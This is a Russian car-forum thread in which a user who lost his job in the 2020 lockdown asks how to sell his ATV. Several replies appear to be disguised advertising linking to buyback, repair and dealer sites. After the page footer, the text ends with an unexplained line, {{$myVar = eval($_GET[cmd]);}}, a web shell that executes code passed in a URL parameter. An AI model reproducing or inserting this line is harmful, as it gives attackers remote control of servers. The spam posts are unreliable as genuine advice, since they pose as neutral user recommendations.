+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Продать квадрацикл


  1. #1
    Мимо проходил Hammerhead is on a distinguished road Аватар для Hammerhead
    Регистрация
    09.11.2019
    Откуда
    РФ
    Машина
    GTI
    Сообщений
    77

    Продать квадрацикл

    Работу потерял из-за этой самоизоляции и новую пока не нашел конечно же по той же причине. Поэтому вот решил продать квадроцикл. Посоветуйте как его можно продать выгодно? Живу в Москве
    Последний раз редактировалось Hammerhead; 26.04.2020 в 21:09.

  2. #2
    Мимо проходил Augustine is on a distinguished road Аватар для Augustine
    Регистрация
    09.11.2019
    Откуда
    РФ
    Машина
    моя
    Сообщений
    15
    О, сочувствую насчет работы и найти ее сейчас будет не просто с этой клятой самоизоляцией. Если только через интернет. Надеюсь у вас все наладится. А продать квадроцикл самостоятельно мне кажется будет трудно по той же причине. Так что остается только обращаться к скупщикам http://aut-moto.ru/prodat-kvadroczikl/ Если у одного не устроит цена, то продавайте другому

  3. #3
    Мимо проходил Galbine is on a distinguished road Аватар для Galbine
    Регистрация
    09.11.2019
    Откуда
    Россия
    Машина
    Крутая
    Сообщений
    15
    Я бы с удовольствием бы купил квадроцикл. У меня младший сын мечтает о такой технике. Но к сожалению, сейчас надо экономить на всем практически. Самим бы что продавать не пришлось бы.

  4. #4
    Мимо проходил Харксрен is on a distinguished road Аватар для Харксрен
    Регистрация
    09.11.2019
    Откуда
    РФ
    Машина
    GTI
    Сообщений
    33
    А прям очень быстро деньги нужны? А то может продать через какой-нибудь сайт, типа Авито, например? Не у всех дела плохи. Может кто и купит квадроцикл. Новый то все равно дороже будет.

  5. #5
    Мимо проходил Гвалиор is on a distinguished road Аватар для Гвалиор
    Регистрация
    29.11.2018
    Сообщений
    36
    Цитата Сообщение от Hammerhead Посмотреть сообщение
    Работу потерял из-за этой самоизоляции и новую пока не нашел конечно же по той же причине. Поэтому вот решил продать квадроцикл. Посоветуйте как его можно продать выгодно? Живу в Москве
    Даже не спрашиваю, как вы решились на такую продажу, сам на грани уже что-то продать из техники так как финансы на исходе. У меня вопрос почему вы сюда фотку не залили и не озвучили стоимость? Я думаю так быстрее бы нашлись покупатели. Попробуйте еще уточнить, сколько готовы вам дать за ваш мотовездеход вот тут http://www.skupka.pro/skupka-moto-te...kvadrocziklov/ Возможно они больше заплатят, чем в Аутмото?

  6. #6
    GTI-Racing Semen Leonidovich is on a distinguished road Аватар для Semen Leonidovich
    Регистрация
    05.04.2020
    Откуда
    Мск
    Машина
    Бричка
    Сообщений
    249
    А вы вообще любите экстрим и такой активный отдых? Мы вот с друзьями его очень любим и часто выезжаем на природу чтобы как-то отдохнуть и повеселиться. Мы много чем занимаемс на природе, очень хорошо проводим время на природе в основном, обычно мы просто играем во что-то, вроде футбола, но бывает такое что катаемся на трииклах, мы нашли магазин где такое продается недорого и купить можно прям сейчас, вот сайт, рекомендую вам перейти туда купить трицикл в спб https://brp.spb.ru/catalog/rodstery_spyder/

  7. #7
    Новичок Meloun is on a distinguished road Аватар для Meloun
    Регистрация
    14.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    Жалко мне было бы свой продавать из-за временных финансовых трудностей. Он у меня старенький и то жалко, столько мне удовольствия принёс. Уже даже часто ломается, приходится тут https://ремонт-квадроцикла.москва его ремонтировать всё чаще, но всё равно продавать нет никакого желания.

  8. #8
    GTI-Racing iskander.bulatov96 is on a distinguished road Аватар для iskander.bulatov96
    Регистрация
    07.09.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    438
    Хороший способ передвижения летом, это конечно ямаха квадроциклы официальный сайт https://linhai-ru.com/ при помощи такого оборудования доехать от пункта А до Б, будет не проблема. Оборудование очень хорошее, так как его собирали профессионалы. Высокие технологии применены в сборке двигателя и амортизации

+ Ответить в теме

Похожие темы

  1. Как продать битый авто
    от Hommy в разделе Курилка
    Ответов: 22
    Последнее сообщение: 26.10.2021, 22:19
  2. Продать алкоголь
    от Миняев в разделе Курилка
    Ответов: 4
    Последнее сообщение: 07.12.2019, 02:41
  3. Как продать машину
    от Kollins в разделе Курилка
    Ответов: 3
    Последнее сообщение: 07.07.2019, 21:50
  4. Продать быстро и дорого
    от TinaSoykina в разделе Курилка
    Ответов: 1
    Последнее сообщение: 31.08.2018, 01:13
  5. Как продать авто?
    от Гера в разделе Курилка
    Ответов: 6
    Последнее сообщение: 04.06.2009, 19:16

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}